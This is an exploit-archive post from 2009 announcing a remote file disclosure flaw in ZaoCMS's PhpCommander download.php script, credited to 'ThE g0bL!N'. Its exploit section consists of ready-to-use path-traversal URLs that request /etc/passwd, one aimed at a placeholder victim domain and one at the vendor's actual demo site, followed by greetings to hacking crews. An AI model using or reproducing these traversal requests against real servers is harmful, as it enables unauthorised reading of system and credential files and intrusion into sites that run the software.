[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ZaoCMS (download.php) Remote File Disclosure Vulnerability
# Published : 2009-05-21
# Author : ThE g0bL!N
# Previous Title : Joomla Casino 0.3.1 Multiple SQL Injection Exploits
# Next Title : Catviz 0.4.0b1 (LFI/XSS) Multiple Remote Vulnerabilities


--------------------------------------------------------------
ZaoCMS Remote File Disclosure Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.zaocms.com/
Software : ZaoCMS
Note: The OperatIon Worked By Deleting Your Cookies From The Vuln 1
---------------------------------------------------------------
Exploit:
---------
http://wwww.victim.co.il/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F
demo:
-------
http://demo.zaocms.com/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F
-----------------------------------------------------------------------------------------------------
His0k4  - Dr-HTmL , Dos-Dz TeaM , Kondamne , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r.
-----------------------------------------------------------------------------------------------------

# www.Syue.com [2009-05-21]